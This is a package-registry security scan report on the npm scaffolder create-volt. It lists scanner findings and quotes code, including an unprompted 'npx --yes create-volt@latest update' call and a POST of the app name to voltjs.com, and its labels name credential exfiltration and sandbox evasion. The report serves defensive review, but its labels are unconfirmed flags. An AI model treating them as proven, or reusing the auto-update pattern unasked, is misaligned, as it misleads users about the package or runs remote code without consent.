registry  /  create-volt  /  0.56.1

create-volt@0.56.1

⚠ Under review

Scaffold a new Volt app — no-build, signals-based UI with Socket.io hot reload.

Static Scan Results

scanned 2h ago · by rust-scanner

Static analysis flagged 14 finding(s) at 86.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
High-risk behavior combination matched malicious policy.

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessCryptoDynamicRequireEnvironmentVarsFilesystemNetworkShellWebSocket
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 69 file(s), 636 KB of source, external domains: aistudio.google.com, api.anthropic.com, api.openai.com, cdn.example.com, cdn.jsdelivr.net, console.anthropic.com, example.com, generativelanguage.googleapis.com, nyc3.digitaloceanspaces.com, platform.openai.com, registry.npmjs.org, schema.org, voltjs.com

Source & flagged code

7 flagged · loading source
index.jsView file
12import path from "node:path"; L13: import { spawnSync } from "node:child_process"; L14: import { fileURLToPath } from "node:url";
High
Child Process

Package source references child process execution.

index.jsView on unpkg · L12
12import path from "node:path"; L13: import { spawnSync } from "node:child_process"; L14: import { fileURLToPath } from "node:url"; ... L17: L18: const __dirname = path.dirname(fileURLToPath(import.meta.url)); L19: const require = createRequire(import.meta.url); L20: const pkg = require("./package.json"); L21: L22: // --- tiny ANSI helpers (no deps; degrade to plain text when not a TTY) --- L23: const tty = process.stdout.isTTY; L24: const c = (code) => (s) => (tty ? `\x1b[${code}m${s}\x1b[0m` : String(s)); ... L116: " // a tiny example API",
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

index.jsView on unpkg · L12
4// npm create volt@latest my-app L5: // npx create-volt my-app L6: // npm create volt@latest my-app -- --skip-install ... L12: import path from "node:path"; L13: import { spawnSync } from "node:child_process"; L14: import { fileURLToPath } from "node:url";
High
Runtime Package Install

Package source invokes a package manager install command at runtime.

index.jsView on unpkg · L4
addons/pages/files/lib/pages.jsView file
146if (fs.existsSync(bundled)) { L147: const t = wrap(await import(freshUrl(bundled))); L148: if (t) return t;
Medium
Dynamic Require

Package source references dynamic require/import behavior.

addons/pages/files/lib/pages.jsView on unpkg · L146
templates/business/server.jsView file
4// config page: tick add-ons, fill settings, Apply. Apply writes .env (a L5: // VOLT_ADDONS list + settings) and adds any needed packages to package.json, L6: // runs npm install, then starts the app — which wires whatever .env enables. ... L10: L11: import http from "node:http"; L12: import fs from "node:fs"; ... L14: import crypto from "node:crypto"; L15: import { spawn, spawnSync } from "node:child_process"; L16: import { fileURLToPath, pathToFileURL } from "node:url"; ... L20: L21: const __dirname = path.dirname(fileURLToPath(import.meta.url)); L22: const ENV_PATH = path.join(__dirname, ".env");
Critical
Credential Exfiltration

Source appears to send environment or credential material to an external endpoint.

templates/business/server.jsView on unpkg · L4
353try { L354: const r = spawnSync("npx", ["--yes", "create-volt@latest", "update"], { cwd: __dirname, encoding: "utf8", shell: process.platform === "win32" }); L355: res.end(JSON.stringify({ ok: r.status === 0, output: ((r.stdout || "") + (r.stderr || "")).slice(-2000) })); L356: } catch (e) { ... L365: const env = readEnvFile(); L366: const base = (env.VOLT_AI_GATEWAY || "https://voltjs.com/api/ai").replace(/\/api\/ai\/?$/, ""); L367: fetch(base + "/api/register", { method: "POST", headers: { "content-type": "application/json" }, body: JSON.stringify({ app: env.SITE_NAME || "volt-app" }) })
High
Command Output Exfiltration

Source combines command execution, command-output handling, and outbound requests; review data flow before blocking.

templates/business/server.jsView on unpkg · L353
4// config page: tick add-ons, fill settings, Apply. Apply writes .env (a L5: // VOLT_ADDONS list + settings) and adds any needed packages to package.json, L6: // runs npm install, then starts the app — which wires whatever .env enables. ... L10: L11: import http from "node:http"; L12: import fs from "node:fs"; ... L14: import crypto from "node:crypto"; L15: import { spawn, spawnSync } from "node:child_process"; L16: import { fileURLToPath, pathToFileURL } from "node:url"; ... L20: L21: const __dirname = path.dirname(fileURLToPath(import.meta.url)); L22: const ENV_PATH = path.join(__dirname, ".env");
Low
Weak Crypto

Package source references weak cryptographic algorithms.

templates/business/server.jsView on unpkg · L4

Findings

1 Critical5 High4 Medium4 Low
CriticalCredential Exfiltrationtemplates/business/server.js
HighChild Processindex.js
HighShell
HighCommand Output Exfiltrationtemplates/business/server.js
HighSandbox Evasion Gated Capabilityindex.js
HighRuntime Package Installindex.js
MediumDynamic Requireaddons/pages/files/lib/pages.js
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowWeak Cryptotemplates/business/server.js
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings